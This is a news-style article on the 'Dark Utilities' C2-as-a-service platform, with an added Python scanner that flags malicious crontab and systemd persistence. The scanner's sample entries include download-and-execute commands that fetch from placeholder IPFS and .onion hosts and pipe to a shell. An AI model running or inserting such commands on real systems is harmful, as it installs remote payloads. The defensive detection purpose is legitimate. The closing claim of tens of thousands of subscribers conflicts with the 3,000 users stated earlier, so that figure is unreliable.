A command-and-control (C2) server is the channel through which attackers remotely control their malware: sending commands, configurations, and new payloads, and receiving data collected from attacked systems.
“Dark Utilities” operates as a “C2-as-a-Service” that claims to provide a reliable, anonymous C2 infrastructure with all the necessary extras, starting at just €9.99.
A report from Cisco Talos said the service has around 3,000 active users, which would bring the operator around 30,000 euros in revenue.
Dark Utilities emerged in early 2022, providing full C2 capabilities on both the Tor network and the clear web, and hosting malware payloads in IPFS (the InterPlanetary File System), a decentralized network system for storing and sharing data.
The one-stop service also supports multiple architectures, and the operator appears to be planning to expand the list to cover a larger selection of devices that could be targeted.
Choosing an operating system results in a command string that “threats typically embed in PowerShell or Bash scripts to facilitate retrieval and execution of malicious payloads on victim machines,” Cisco Talos researchers said.
The selected payload also establishes a persistent presence on the target system by creating a registry key on Windows, or a Crontab entry or a Systemd service on Linux.
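A defender-side check for the Linux persistence locations named above, as an added example that is not from the Talos report or this article: it scans crontab job lines and systemd `Exec*` directives for entries that pipe a download into a shell or fetch from an IPFS gateway path or a Tor `.onion` host. The rule set, function names, and sample entries are assumptions constructed for illustration; the Windows registry side is not covered.

```python
import re

# Heuristics assumed for this example (not indicators from the Talos report):
# flag entries that pipe a download into a shell, or fetch from IPFS or Tor.
RULES = {
    "download_and_execute": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    "ipfs_gateway_fetch": re.compile(r"https?://[^\s'\"]+/ipfs/[A-Za-z0-9]+"),
    "onion_host": re.compile(r"https?://[a-z2-7]{16,56}\.onion\b"),
}

def crontab_commands(text):
    """Yield (line_no, command) for each job line of a user crontab."""
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line[0] == "#" or re.match(r"[A-Za-z_]+\s*=", line):
            continue  # blank line, comment, or VAR=value setting
        fields = 1 if line.startswith("@") else 5  # @reboot vs. 5 time fields
        parts = line.split(None, fields)
        if len(parts) == fields + 1:
            yield no, parts[fields]

def systemd_commands(text):
    """Yield (line_no, command) for each Exec* directive of a unit file."""
    for no, line in enumerate(text.splitlines(), 1):
        m = re.match(r"\s*Exec\w+\s*=\s*(.+)", line)
        if m:
            yield no, m.group(1)

def scan(text, kind):
    """Return [(line_no, rule)] hits; kind is 'cron' or 'systemd'."""
    extract = crontab_commands if kind == "cron" else systemd_commands
    return [(no, name) for no, cmd in extract(text)
            for name, rx in RULES.items() if rx.search(cmd)]

# Constructed samples: hosts and the CID are placeholders, not real indicators.
SAMPLE_CRON = """\
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
@reboot curl -s http://gw.example.invalid/ipfs/QmPLACEHOLDERCID | bash
*/10 * * * * wget -qO- http://exampleexampleexampleexample.onion/x | sh
"""
SAMPLE_UNIT = """\
[Service]
ExecStart=/bin/sh -c "curl -so /tmp/u http://gw.example.invalid/ipfs/QmPLACEHOLDERCID; /tmp/u"
"""

if __name__ == "__main__":
    print(scan(SAMPLE_CRON, "cron"), scan(SAMPLE_UNIT, "systemd"))
```

The unit-file sample downloads and runs in two steps rather than through a pipe, so only the IPFS rule fires on it; that is why the fetch-location rules are kept separate from the pipe-to-shell rule.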
According to the researchers, the client’s admin panel comes with multiple modules for various types of attacks, including distributed denial of service (DDoS) and cryptojacking.
With tens of thousands of threat actors already subscribed and prices this low, Dark Utilities could attract even more less-skilled adversaries.